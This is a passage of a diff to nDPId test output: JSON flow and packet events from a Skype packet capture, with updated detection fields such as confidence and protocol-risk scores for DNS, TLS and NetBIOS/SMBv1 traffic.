 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970636340,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1431970636340,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.28","src_port":51232,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1431970636340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"ts_msec":1431970636340,"pkt":"0NQSxnP1PBXCt3IOCABFAABAozBAAEAGBGnAqAEinTg0HMggAbskulgsAAAAALAC\/\/+RjgAAAgQFtAEDAwUBAQgKPjGNXAAAAAAEAgAA"}
 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1431970636420,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970636420,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6ONsAAEARvmTAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
@@ -108,123 +108,123 @@
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1431970637443,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"ts_msec":1431970637443,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6+FgAAEAR\/ubAqAEiwKgBAfgaADUAJptGWcsBAAABAAAAAAAAAnVpBXNreXBlA2NvbQAAAQAB"}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABLoPEAAEARVj3AqAEiwKgBAcOHADUANwqgVG4BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1431970638471,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1431970638471,"pkt":"0NQSxnP1PBXCt3IOCABFAABL\/NIAAEAR+lvAqAEiwKgBAcopADUAN1kA5GsBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="}
-00615{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
+00650{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":448,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431970637197,"flow_last_seen":1431970639484,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":626,"flow_tot_l4_payload_len":5882,"flow_avg_l4_payload_len":183,"midstream":1,"ts_msec":1431970639484,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"17.172.100.36","src_port":51227,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Apple","breed":"Safe","category":"Web"}}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1431970642408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkRoAAEARZRPAqAEiwKgB\/wCJAIkAOosFRXIBEAABAAAAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":477,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642408,"flow_last_seen":1431970642408,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970642408,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1431970642408,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970642408,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOP7YAAEARtnfAqAEiwKgB\/wCJAIkAOrIIRXEBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":479,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1431970642409,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970642409,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAABOkDsAAEARZfLAqAEiwKgB\/wCJAIkAOrIDRXYBEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1431970642412,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"ts_msec":1431970642412,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARtFGRXKFgAAAAAEAAAAAIEFCQUNGUEZQRU5GREVDRkNFUEZIRkRFRkZQRlBBQ0FCAAAgAAEAA\/SAAAaAAMCoAQE="}
-00614{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642412,"flow_last_seen":1431970642412,"flow_idle_time":180000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":0,"ts_msec":1431970642412,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":482,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1431970642413,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":104,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":104,"pkt_l4_len":70,"ts_msec":1431970642413,"pkt":"PBXCt3IO0NQSxnP1CABFAABaAABAAEARtx\/AqAEBwKgBIgCJAIkARnhKRXGFgAAAAAEAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAEAA\/SAAAYAAMCoAQE="}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1431970642414,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1431970642414,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAADKa30AAEARijTAqAEiwKgB\/wCKAIoAtudmEQJFcMCoASIAAACgAAAgRU1GRkVERUJGREVORUJFREVDRVBFUEVMRkFGQ0VQQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAcAIAAG9FEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQRuRQAA"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":483,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642414,"flow_last_seen":1431970642414,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970642414,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1431970642417,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":1431970642417,"pkt":"PBXCt3IO0NQSxnP1CABFAADUAABAAEARtqXAqAEBwKgBIgCKAIoAwKmzEAoqm8CoAQEAigCqAAAgRUJFTUVKRURFRkVIRUJGRUVGQ0FDQUNBQ0FDQUNBQUEAIEVNRkZFREVCRkRFTkVCRURFQ0VQRVBFTEZBRkNFUEFBAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAQAFYAAwABAAEAAgAhAFxNQUlMU0xPVFxCUk9XU0UACgFuRQAAQUxJQ0VHQVRFAA=="}
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":484,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970642417,"flow_last_seen":1431970642417,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":184,"midstream":0,"ts_msec":1431970642417,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.34","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1431970642418,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970642418,"pkt":"0NQSxnP1PBXCt3IOCABFAABOXUsAAEARmeDAqAEiwKgBAQCJAIkAOtIRRXgAAAABAAAAAAAAIEVCRU1FSkVERUZFSEVCRkVFRkNBQ0FDQUNBQ0FDQUNBAAAhAAE="}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1431970643669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970643669,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOBnEAAEAR74LAqAFcwKgB\/wCJAIkAOrExRg4BEAABAAAAAAAAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAAAgAAE="}
-00616{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643669,"flow_last_seen":1431970643669,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643669,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00680{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAADKWJAAAEARnOfAqAFcwKgB\/wCKAIoAtjdgEQJGDcCoAVwAAACgAAAgRU1GRkVERUJGRENORUpFTkVCRURDQUNBQ0FDQUNBQUEAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAACwUAAAxGEQAABgAAAAAAAAACAAAAAAAAAAAAAAAGAFYAAwABAAEAAgAXAFxNQUlMU0xPVFxCUk9XU0UACQQLRgAA"}
-00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1431970643670,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"ts_msec":1431970643670,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABOJN8AAEAR0RTAqAFcwKgB\/9JCAIkAOpbmnKMBEAABAAAAAAAAIEVNRkZFREVCRkRDTkVKRU5FQkVEQ0FDQUNBQ0FDQUFBAAAgAAE="}
-00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":503,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970643670,"flow_last_seen":1431970643670,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1431970643670,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":53826,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
